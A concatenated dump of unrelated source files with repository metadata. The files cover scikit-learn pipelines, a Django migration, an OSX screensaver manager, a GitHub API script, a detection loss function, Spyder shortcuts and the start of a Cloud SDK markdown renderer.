print("(%s:%s)" % (sys.exc_info()[0], sys.exc_info()[1]))
| [
"frcalsso@yahoo.com.br"
] | frcalsso@yahoo.com.br |
b98b5fab53f246bfb7259d79aeeba263873e17d1 | 18d223e5ea590e60bc791987034276eed2651721 | /sk1-tt/lesson2-data-processing/c5-put-it-all-together/c50_pipeline_sample.py | 539f7210c85f09ecf85bf1e3d45298cb7f22b35d | [] | no_license | sonicfigo/tt-sklearn | 83b419b4f8984fc63ef41bf2af5b682477350992 | 8e473e958b0afc6154ba3c4dee818fd4da8f504b | refs/heads/master | 2020-03-26T16:07:59.758723 | 2018-09-25T06:28:47 | 2018-09-25T06:28:47 | 145,084,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,879 | py | # coding=utf-8
"""
非官网,网络帖子里的书写例子
除了最后一个学习器之外,前面的所有学习器必须提供transform方法,
该方法用于数据转化,如:
- 归一化
- 正则化
- 特征提取
若没有,就异常
"""
from sklearn.datasets import load_digits
from sklearn import cross_validation
from sklearn.model_selection import train_test_split
from sklearn.svm import LinearSVC
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn.decomposition import PCA
m2 = LogisticRegression(C=1)
def test_Pipeline_ex(data):
m1 = LinearSVC(C=1, penalty='l1', dual=False)
pipeline = Pipeline(steps=[('Linear_SVM', m1),
('LogisticRegression', m2)])
x_train, x_test, y_train, y_test = data
pipeline.fit(x_train, y_train)
print('name steps:', pipeline.named_steps)
print('Pipeline Score:', pipeline.score(x_test, y_test))
"""
工作流程:先进行pca降为,然后使用Logistic回归,来分类
"""
def test_Pipeline_ok(data):
pipeline = Pipeline(steps=[('PCA', PCA()),
('LogisticRegression', m2)])
x_train, x_test, y_train, y_test = data
pipeline.fit(x_train, y_train)
print('name steps:', pipeline.named_steps)
print('Pipeline Score:', pipeline.score(x_test, y_test))
if __name__ == '__main__':
data = load_digits()
X = data.data
y = data.target
try:
test_Pipeline_ex(train_test_split(X, y, test_size=0.25,
random_state=0, stratify=y))
except BaseException as ex:
print('\n===================error:')
print(ex)
print('\n===================ok:')
test_Pipeline_ok(train_test_split(X, y, test_size=0.25,
random_state=0, stratify=y))
| [
"sonic821113@gmail.com"
] | sonic821113@gmail.com |
c616d088f24594e7ea52799570d97027ccf70e4c | f4d4111c7e51bb2c66ea73198b3f99458ba5822f | /Aula 7/ex012.py | 940e268c61dac38b6eff058984d2498b18da2f33 | [] | no_license | LukeBreezy/Python3_Curso_Em_Video | 871b98b4e56db356fc24f2e953ad33e8928ba118 | 34ad1b5037f916964bde99b500a28aed86f18e39 | refs/heads/main | 2023-03-03T03:33:44.805522 | 2021-02-11T19:52:13 | 2021-02-11T19:52:13 | 338,129,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 210 | py | prod = float(input('Qual o valor do produto? R$ '))
promo = prod * 0.95
print('O produto com o valor de R$ {:.2f}, na promoção com 5% de desconto fica R$ {:.2f}.'.format(prod, promo).replace('.', ',', 1)) | [
"lkslukas23@gmail.com"
] | lkslukas23@gmail.com |
1570ad62bbaf6ae4817b1160b2254c7b7ca68faa | 43c863fbab46daa09acc4bb178292145a6776929 | /pathfinder/terminal/phybeast/utils/prepare_metadata/commands.py | fe7033acb2c3b3cac2743fc5e694f34661d93649 | [
"MIT"
] | permissive | pf-core/pf-core | be034a420e084e416791c98b659b757c3d7e88c3 | 0caf8abde968b959be2284518f7dc951ba680202 | refs/heads/master | 2020-07-29T04:53:25.306031 | 2019-09-24T05:44:54 | 2019-09-24T05:44:54 | 209,677,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 738 | py | import click
from pathlib import Path
from pathfinder.utils import phybeast_prepare_metadata_file
@click.command()
@click.option(
"--meta_data", "-m", default="input_alignment.fasta", type=Path,
help="Input meta data file, tab-delimited, includes: name, date columns.",
)
@click.option(
"--prep", "-p", default="lsd2", help="Prepare metadata file for one of: lsd2, treetime.", type=str,
)
@click.option(
"--output", "-o", default="lsd2.meta", help="Output path of prepared meta data file.", type=Path,
)
def prepare_metadata(meta_data, prep, output):
""" Randomise the dates in a meta data file with columns: name, date """
phybeast_prepare_metadata_file(meta_file=meta_data, prep=prep, output_file=output)
| [
"eikejoachim.steinig@my.jcu.edu.au"
] | eikejoachim.steinig@my.jcu.edu.au |
0a0d1ba92277fb656ae7de2143df0380583d70dc | ca0c3c1cdfdd714c7780c27fcecd4a2ae39d1474 | /src/fmf/apps/news/migrations/0010_auto__add_field_news_category.py | daa06d37ddb7c686a069b09ab5a6ea086d5e4122 | [] | no_license | vasyabigi/fmf | fce88a45fb47f3f7652995af40b567ffdf27a4a0 | 988ba668f3ce6da2670b987a1eeae3c87761eac5 | refs/heads/master | 2021-01-23T07:29:52.185306 | 2012-08-27T13:11:51 | 2012-08-27T13:11:51 | 2,803,493 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,032 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'News.category'
db.add_column('news_news', 'category',
self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'News.category'
db.delete_column('news_news', 'category')
models = {
'news.event': {
'Meta': {'ordering': "('-date_to',)", 'object_name': 'Event'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_from': ('django.db.models.fields.DateField', [], {}),
'date_to': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'description_en': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description_uk': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'short_description': ('django.db.models.fields.TextField', [], {}),
'short_description_en': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'short_description_uk': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '256'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'title_en': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title_uk': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'})
},
'news.news': {
'Meta': {'ordering': "('position',)", 'object_name': 'News'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'description_en': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description_uk': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'main_image': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'position': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'short_description': ('django.db.models.fields.TextField', [], {}),
'short_description_en': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'short_description_uk': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '256'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'title_en': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title_uk': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'})
},
'news.newsimage': {
'Meta': {'ordering': "('position',)", 'object_name': 'NewsImage'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '100'}),
'news': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'images'", 'to': "orm['news.News']"}),
'position': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title_en': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title_uk': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['news'] | [
"vasyl.stanislavchuk@djangostars.com"
] | vasyl.stanislavchuk@djangostars.com |
fff6dfaf784645d56848142b12192e76bdd9d750 | 2696bd485fd09f8b0199f98972163e1140793fd1 | /ems/errorplugin.py | 91c8226da8423505c58c9beebd227ba9a114261d | [
"MIT"
] | permissive | mtils/ems | 24b192faf1d03f78cb9c930193051666a453d18b | a958177d1474828e1d892dda20f4be68869e0483 | refs/heads/master | 2020-05-30T04:37:52.866679 | 2016-10-04T07:30:42 | 2016-10-04T07:30:42 | 30,531,077 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | '''
Created on 28.11.2010
@author: michi
'''
from abc import ABCMeta,abstractmethod
import ems.errorhandler
class ErrorPlugin(object):
'''
classdocs
'''
__metaclass__ = ABCMeta
@abstractmethod
def notify(self,caller,eventName,params):
pass
def getHandler(self):
return self.__handler
def setHandler(self, value):
if not isinstance(value, ems.errorhandler):
raise TypeError("The Errorhandler has to by class or subclass of ems.errorhandler")
self.__handler = value
def delHandler(self):
del self.__handler
handler = property(getHandler, setHandler, delHandler, "emitter's docstring")
| [
"mtils@web-utils.de"
] | mtils@web-utils.de |
0d47747a40d0c7c0273029effd0c1b8334da506e | c2ee9d6d84e2270ba4c9d6062460a2be0ff5f19c | /674. Longest Continuous Increasing Subsequence.py | 4e450a4b5cac87731b991e0dd25d8a1e2656db08 | [] | no_license | Peiyu-Rang/LeetCode | 0dd915638e8c41c560952d86b4047c85b599d630 | f79886ed3022664c3291e4e78129bd8d855cf929 | refs/heads/master | 2021-11-27T23:48:39.946840 | 2021-11-09T12:47:48 | 2021-11-09T12:47:48 | 157,296,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Sep 23 23:00:52 2021
@author: Caven
"""
class Solution:
def findLengthOfLCIS(self, nums: List[int]) -> int:
res = 0
curr_len = 0
left = 0
right = 0
n = len(nums)
while right < n:
if left == right or nums[right] > nums[right - 1]:
right +=1
else:
curr_len = right - left
res = max(res, curr_len)
left = right
right +=1
curr_len = right - left
res = max(res, curr_len)
return res | [
"prang3@gatech.edu"
] | prang3@gatech.edu |
17d39886af1a592ec0dccba77fce4f04b761ae65 | a979aeeb72f46a74a2d59ae8be88ee1553fe1419 | /learn_jinja2/p02_loader.py | 091acb5be0ba0fc13e952ecdc0269798dc0e3a91 | [] | no_license | MacHu-GWU/learn_jinja2-project | 6426db19c222fd58f7abf906911bd54afce694d6 | ec343516bf98a8b05a717d6030807237e47e8e48 | refs/heads/master | 2021-01-11T17:55:03.757324 | 2017-02-13T21:29:29 | 2017-02-13T21:29:29 | 79,875,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
loader是jinja2中用于从文件中读取模板代码的中间类。
- FileSystemLoader: 指定一个目录, 在目录下根据文件名寻找模板。
- PackageLoader: 指定一个安装好的python包, 在 ``package_name.package_path`` 目录
下寻找模板。
- DictLoader: 使用 ``{key: source}`` 的形式读取模板。
- FunctionLoader: 使用一个函数, 接受key为输入, 返回模板源代码。
ref: http://jinja.pocoo.org/docs/2.9/api/#loaders
""" | [
"husanhe@gmail.com"
] | husanhe@gmail.com |
4eed77ded43f3a75192036d14cd1d98c2408c5b9 | df23ee09fffae3ea6a32925f80996f474aefabb9 | /src/myclips/rete/tests/VariableBindingTest.py | 50ad939a4d62e44007c29295d99499e69bb6b296 | [] | no_license | stefano-bragaglia/myclips | 9e5e985d4b67250723012da4b2ed720e2bfeac72 | bb7b8dc6c1446235777c0e4ebf23e641d99ebc03 | refs/heads/master | 2022-08-01T10:09:45.019686 | 2020-05-27T19:59:47 | 2020-05-27T19:59:47 | 267,410,326 | 0 | 0 | null | 2020-05-27T19:38:28 | 2020-05-27T19:38:28 | null | UTF-8 | Python | false | false | 3,435 | py | '''
Created on 24/lug/2012
@author: Francesco Capozzo
'''
from myclips.rete.tests.BetaTest import BetaTest
import myclips
from myclips.rete.tests.locations import VariableReference
from myclips.rete.tests import getTokenAnchestor
class VariableBindingTest(BetaTest):
'''
Make sure that variable binding is consistent
through multiple variable locations
'''
def __init__(self, reference):
'''
Create a new VariableBindingTest. This test make sure
that if a variable is used in multiple locations,
it has a consistent value across all locations
@param reference: is a location with a reference to a previous binded variable
@type reference: VariableReference
@return: False if test fail, True otherwise
@rtype: Boolean
'''
self._reference = reference
# self._wmePositionIndex = wmePositionIndex
# self._tokenRelativeIndex = tokenRelativeIndex
# self._tokenPositionIndex = tokenPositionIndex # this is an array of position.
# This allow to go deep inside fact-index
# and multifield-index in fact index
@property
def reference(self):
return self._reference
def isValid(self, token, wme):
reference = self._reference
assert isinstance(reference, VariableReference)
try:
# if token relative index is 0, then the test is an intra-element
# test performed in the beta network
# this means that the wme where the variable was found first
# is the same where the variable was found again
if reference.relPatternIndex != 0:
nToken = getTokenAnchestor(token, (-1 * reference.relPatternIndex) - 1)
# get the exact wme value of the token where variable for used first
valueInTokenWme = reference.reference.toValue(nToken.wme)
else:
valueInTokenWme = reference.reference.toValue(wme)
# get the value in current wme there variable must have the same value
valueInWme = reference.toValue(wme)
# when i've found them all
# i can compare them
# for eq or neq based on reference.isNegative value
eqResult = (valueInTokenWme == valueInWme)
return eqResult if reference.isNegative is not True else not eqResult
except KeyError:
# it's ok. If a catch this exception
# means that the wme has not an index at all
# so no value can be tested.
# This make the test fail
return False
except Exception, e:
# Another type of exception catch
# better log this
myclips.logger.warning("Unexpected exception caught in %s: token=%s, wme=%s, exception=%s", self, token, wme, repr(e))
# anyway test failed
return False
def __str__(self, *args, **kwargs):
return str(self._reference)
def __eq__(self, other):
return self.__class__ == other.__class__ \
and self._reference == other._reference
def __neq__(self, other):
return not self.__eq__(other) | [
"ximarx@gmail.com"
] | ximarx@gmail.com |
73467450fa0036f7742a72b47a6eb21901b226b2 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2634/59018/259642.py | 59bb88db2941ce3defa4ee3eae4a3aeb0e918c70 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | from fractions import Fraction
a1=input()[1:-1].split(',')
a=[int(y) for y in a1]
b=[]
k=int(input())
for j in range(len(a)-1):
for i in range(j+1,len(a)):
b.append(Fraction(a[j],a[i]))
b.sort()
print(b) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
d5f98c309f1abe4ac6a2df5d704373d1c64f5461 | 08e0fdf4c9b516b96e65b94c2cc9dbda61af6f50 | /screensaver.py | 61830f6042b24fb282196a4463be0bd8895846e4 | [
"CC0-1.0"
] | permissive | von/scripts | 1d1f8e7310ee5f0f48141a199225ef00513216ff | bef4acf5c5e99a74e1759045c13496708f5430d4 | refs/heads/main | 2023-04-06T03:34:19.770846 | 2023-04-01T23:50:25 | 2023-04-01T23:50:59 | 1,017,631 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,987 | py | #!/usr/bin/env python3
"""Manage the OSX screensaver
OSX seems to only accept following values for screensaver idle delay:
60, 120, 300, 600, 1200, 1800, 6000
"""
import argparse
import subprocess
import sys
import time
# Default time to delay screensaver in seconds.
# Note, see --delay, this must be one of set of values accepted by OSC.
DEFAULT_DELAY = 1200
# Default time to suspend in seconds
DEFAULT_SUSPEND_TIME = 3600
def killall_cfprefsd():
"""Restart cfprefsd. Needed to causes defaults to be read.
Kudos: https://superuser.com/a/914884"""
return subprocess.call(["killall", "cfprefsd"])
def set_idleTime(seconds):
"""Set idleTime for screensaver.
0 disables the screensaver.
Otherwise, OSX seems to only accept following values:
60, 120, 300, 600, 1200, 1800, 6000
Anything else defaults to 1200.
"""
rc = subprocess.call(["defaults",
"-currentHost",
"write",
"com.apple.screensaver",
"idleTime",
"-int",
str(seconds)
])
if rc:
return rc
rc = killall_cfprefsd()
return rc
def get_idleTime():
"""Get idleTime for screensaver in seconds"""
time_str = subprocess.check_output(
["defaults",
"-currentHost",
"read",
"com.apple.screensaver",
"idleTime"
])
time = int(time_str.strip())
return time
def cmd_disable(args):
"""Disable screensaver"""
args.print_func("Disabling screensaver")
return set_idleTime(0)
def cmd_enable(args):
"""Enable screensaver
If args.time is set, set delay for screensave to args.time seconds.
See set_idleTime() for details."""
delay = args.delay
args.print_func("Enabling screensaver (delay: {}s)".format(delay))
return set_idleTime(delay)
def cmd_get(args):
"""Print screensaver timeout"""
args.print_func(get_idleTime())
return 0
def cmd_suspend(args):
"""Suspend screensaver
If args.delay is set, suspend for args.delay seconds, else one hour"""
suspend_time = args.time
delay = get_idleTime()
args.print_func(
"Suspending screensaver for {} seconds".format(suspend_time))
rc = set_idleTime(0)
if rc:
return rc
time.sleep(suspend_time)
args.print_func(
"Restoring screensaver ({}s)".format(delay))
rc = set_idleTime(delay)
return(rc)
def main(argv=None):
# Do argv default this way, as doing it in the functional
# declaration sets it at compile time.
if argv is None:
argv = sys.argv
# Argument parsing
parser = argparse.ArgumentParser(
description=__doc__, # printed with -h/--help
# Don't mess with format of description
formatter_class=argparse.RawDescriptionHelpFormatter,
# To have --help print defaults with trade-off it changes
# formatting, use: ArgumentDefaultsHelpFormatter
)
# TODO: If no command given, an error results. Should print help.
parser.set_defaults(
cmd_func=None,
print_func=print,
)
parser.add_argument("--version", action="version", version="%(prog)s 1.0")
subparsers = parser.add_subparsers(help="Commands")
# disable command
parser_disable = subparsers.add_parser("disable",
help="disable screensaver")
parser_disable.set_defaults(cmd_func=cmd_disable)
# enable command
parser_enable = subparsers.add_parser("enable",
help="enable screensaver")
# delay command
parser_enable.set_defaults(
cmd_func=cmd_enable,
delay=DEFAULT_DELAY
)
parser_enable.add_argument("delay",
metavar="seconds",
nargs='?',
type=int,
# OSX seems to only accept these values
# anything else defaults to 1200
choices=[60, 120, 300, 600,
1200, 1800, 6000])
# 'get' command: display idle time
parser_disable = subparsers.add_parser("get",
help="get screensave idle time")
parser_disable.set_defaults(cmd_func=cmd_get)
# suspend command
parser_suspend = subparsers.add_parser("suspend",
help="suspend screensaver")
parser_suspend.set_defaults(
cmd_func=cmd_suspend,
time=DEFAULT_SUSPEND_TIME,
)
parser_suspend.add_argument("time",
metavar="seconds",
nargs='?',
type=int)
args = parser.parse_args()
return args.cmd_func(args)
if __name__ == "__main__":
sys.exit(main())
| [
"von@vwelch.com"
] | von@vwelch.com |
f49abc3e33c7bf8bfd68d36cf057d21a6a3eb7a1 | 07b249d8b26fc49f1268798b3bd6bdcfd0b86447 | /0x11-python-network_1/10-my_github.py | f3d952b775ddf198c746692937a4ff8fe84c66f8 | [] | no_license | leocjj/holbertonschool-higher_level_programming | 544d6c40632fbcf721b1f39d2453ba3d033007d6 | 50cf2308d2c9eeca8b25c01728815d91e0a9b784 | refs/heads/master | 2020-09-28T23:21:13.378060 | 2020-08-30T23:45:11 | 2020-08-30T23:45:11 | 226,889,413 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | #!/usr/bin/python3
"""
script that takes your Github credentials (username and password) and uses
the Github API to display your id
"""
if __name__ == "__main__":
import requests
from sys import argv
r = requests.get('https://api.github.com/user', auth=(argv[1], argv[2]))
print(r.json().get('id'))
| [
"leocj@hotmail.com"
] | leocj@hotmail.com |
270847f71701b79d022b44eb6aa6262c706cf026 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/built-in/cv/detection/YoloV3_ID1790_for_PyTorch/mmdet/models/losses/ae_loss.py | 1cedb5ed11153305ccd17816717d025324bbb5ff | [
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 4,350 | py | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..builder import LOSSES
def ae_loss_per_image(tl_preds, br_preds, match):
"""Associative Embedding Loss in one image.
Associative Embedding Loss including two parts: pull loss and push loss.
Pull loss makes embedding vectors from same object closer to each other.
Push loss distinguish embedding vector from different objects, and makes
the gap between them is large enough.
During computing, usually there are 3 cases:
- no object in image: both pull loss and push loss will be 0.
- one object in image: push loss will be 0 and pull loss is computed
by the two corner of the only object.
- more than one objects in image: pull loss is computed by corner pairs
from each object, push loss is computed by each object with all
other objects. We use confusion matrix with 0 in diagonal to
compute the push loss.
Args:
tl_preds (tensor): Embedding feature map of left-top corner.
br_preds (tensor): Embedding feature map of bottim-right corner.
match (list): Downsampled coordinates pair of each ground truth box.
"""
tl_list, br_list, me_list = [], [], []
if len(match) == 0: # no object in image
pull_loss = tl_preds.sum() * 0.
push_loss = tl_preds.sum() * 0.
else:
for m in match:
[tl_y, tl_x], [br_y, br_x] = m
tl_e = tl_preds[:, tl_y, tl_x].view(-1, 1)
br_e = br_preds[:, br_y, br_x].view(-1, 1)
tl_list.append(tl_e)
br_list.append(br_e)
me_list.append((tl_e + br_e) / 2.0)
tl_list = torch.cat(tl_list)
br_list = torch.cat(br_list)
me_list = torch.cat(me_list)
assert tl_list.size() == br_list.size()
# N is object number in image, M is dimension of embedding vector
N, M = tl_list.size()
pull_loss = (tl_list - me_list).pow(2) + (br_list - me_list).pow(2)
pull_loss = pull_loss.sum() / N
margin = 1 # exp setting of CornerNet, details in section 3.3 of paper
# confusion matrix of push loss
conf_mat = me_list.expand((N, N, M)).permute(1, 0, 2) - me_list
conf_weight = 1 - torch.eye(N).type_as(me_list)
conf_mat = conf_weight * (margin - conf_mat.sum(-1).abs())
if N > 1: # more than one object in current image
push_loss = F.relu(conf_mat).sum() / (N * (N - 1))
else:
push_loss = tl_preds.sum() * 0.
return pull_loss, push_loss
@LOSSES.register_module()
class AssociativeEmbeddingLoss(nn.Module):
"""Associative Embedding Loss.
More details can be found in
`Associative Embedding <https://arxiv.org/abs/1611.05424>`_ and
`CornerNet <https://arxiv.org/abs/1808.01244>`_ .
Code is modified from `kp_utils.py <https://github.com/princeton-vl/CornerNet/blob/master/models/py_utils/kp_utils.py#L180>`_ # noqa: E501
Args:
pull_weight (float): Loss weight for corners from same object.
push_weight (float): Loss weight for corners from different object.
"""
def __init__(self, pull_weight=0.25, push_weight=0.25):
super(AssociativeEmbeddingLoss, self).__init__()
self.pull_weight = pull_weight
self.push_weight = push_weight
def forward(self, pred, target, match):
"""Forward function."""
batch = pred.size(0)
pull_all, push_all = 0.0, 0.0
for i in range(batch):
pull, push = ae_loss_per_image(pred[i], target[i], match[i])
pull_all += self.pull_weight * pull
push_all += self.push_weight * push
return pull_all, push_all
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
818560c8ec120e81b3fed0fc5e3cb1e91747f0ba | f05286a2e25950c32c3773f399983b25c87b76b6 | /Setup/SpyderShortcuts.py | fc37c8fb49a51083fab7e60d5ac62258181b1488 | [] | no_license | ajpiter/PythonProTips | cdeaf65771a3f7b21ecd946463e4605a061b9b90 | 5ca6238dfcf248251d6933a313af0ac831ec0117 | refs/heads/master | 2021-07-16T05:30:32.996954 | 2021-04-05T07:44:52 | 2021-04-05T07:44:52 | 92,957,252 | 0 | 1 | null | 2021-01-20T04:21:20 | 2017-05-31T14:53:43 | Python | UTF-8 | Python | false | false | 1,925 | py | #Shortcuts in Spyder
Ctrl-Enter* executes the current cell (menu entry Run ‣ Run cell). A cell is defined as the code between two lines which start with the characters #%%, # %% or # <codecell>.
Shift-Enter* executes the current cell and advances the cursor to the next cell (menu entry Run ‣ Run cell and advance).
Cells are useful for breaking large files or long blocks of code into more manageable chunks. Like those in an IPython notebook, each cell can be run independently.
Alt-Up* moves the current line up. If multiple lines are highlighted, they are moved up together. Alt-Down* works correspondingly, moving line(s) down.
Ctrl-LeftMouseButton or Alt-G* on a function/method in the Editor opens a new Editor tab showing the definition of that function.
Shift-Ctrl-Alt-M* maximizes the current window (or changes the size back to normal if pressed in a maximized window).
Ctrl-Shift-F* activates the Find in Files pane, allowing grep-like searches across all files in a specified scope.
Ctrl - = will increase the font size in the Editor or the Console, whereas Ctrl - - will decrease it.
The font face and size for other parts of the UI can be set under Preferences ‣ General ‣ Appearance ‣ Fonts.
Ctrl-S* in the Editor saves the file currently being edited. This also forces various warning triangles in the left column of the Editor to be updated (otherwise they update every 2.5 seconds by default, which is also configurable).
Ctrl-S* in the Console saves the current IPython session as an HTML file, including any figures that may be displayed inline. This is useful as a quick way of recording what has been done in a session.
(It is not currently possible to load this saved record back into the session -- if you need functionality like this, look for the IPython Notebook).
Ctrl-I* when pressed while the cursor is on an object opens documentation for that object in the help pane.
| [
"noreply@github.com"
] | ajpiter.noreply@github.com |
dd99712e45f55c8a48dd060561422da34ed7e605 | 3433314089e976a121e0a4ff7320d1214faabc8b | /test_autoarray/plot/mapper_rectangular/image_pixel_indexes.py | 0c1ee0a36e3763d8e3a91f0d7aff5ec9206804bc | [
"MIT"
] | permissive | Sketos/PyAutoArray | ab7a63543a35401560ee575c4a8ede7a2561d743 | 72dc7e8d1c38786915f82a7e7284239e5ce87624 | refs/heads/master | 2021-02-12T19:06:17.247806 | 2020-04-10T13:15:00 | 2020-04-10T13:15:00 | 244,619,959 | 0 | 0 | MIT | 2020-03-03T17:21:03 | 2020-03-03T11:35:40 | Python | UTF-8 | Python | false | false | 666 | py | import autoarray as aa
import autoarray.plot as aplt
grid_7x7 = aa.grid.uniform(shape_2d=(7, 7), pixel_scales=0.3)
grid_3x3 = aa.grid.uniform(shape_2d=(3, 3), pixel_scales=1.0)
rectangular_grid = aa.grid_rectangular.overlay_grid(grid=grid_3x3, shape_2d=(3, 3))
rectangular_mapper = aa.mapper(grid=grid_7x7, pixelization_grid=rectangular_grid)
aplt.mapper_obj(mapper=rectangular_mapper, image_pixel_indexes=[0, 1])
aplt.mapper_obj(mapper=rectangular_mapper, image_pixel_indexes=[[0, 1]])
aplt.mapper_obj(mapper=rectangular_mapper, image_pixel_indexes=[[0, 1], [2]])
aplt.mapper_obj(
mapper=rectangular_mapper, image_pixel_indexes=[[(0, 0), (0, 1)], [(1, 2)]]
)
| [
"james.w.nightingale@durham.ac.uk"
] | james.w.nightingale@durham.ac.uk |
cbd326fd284186fd098598ff3f968b2aa2c2310d | 08120ee05b086d11ac46a21473f3b9f573ae169f | /gcloud/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/core/document_renderers/renderer.py | 82b830eae3f231cbb79c97f339a7a7155eff86c8 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | harrystaley/TAMUSA_CSCI4349_Week9_Honeypot | 52f7d5b38af8612b7b0c02b48d0a41d707e0b623 | bd3eb7dfdcddfb267976e3abe4c6c8fe71e1772c | refs/heads/master | 2022-11-25T09:27:23.079258 | 2018-11-19T06:04:07 | 2018-11-19T06:04:07 | 157,814,799 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,398 | py | # -*- coding: utf-8 -*- #
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cloud SDK markdown document renderer base class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import abc
import io
from googlecloudsdk.core import log
from googlecloudsdk.core.resource import resource_printer
import six
from six.moves import range # pylint: disable=redefined-builtin
# Font Attributes.
BOLD, ITALIC, CODE = list(range(3))
class TableColumnAttributes(object):
"""Markdown table column attributes.
Attributes:
align: Column alignment, one of {'left', 'center', 'right'}.
label: Column heading label string.
width: Minimum column width.
"""
def __init__(self, align='left', label=None, width=0):
self.align = align
self.label = label
self.width = width
class TableAttributes(object):
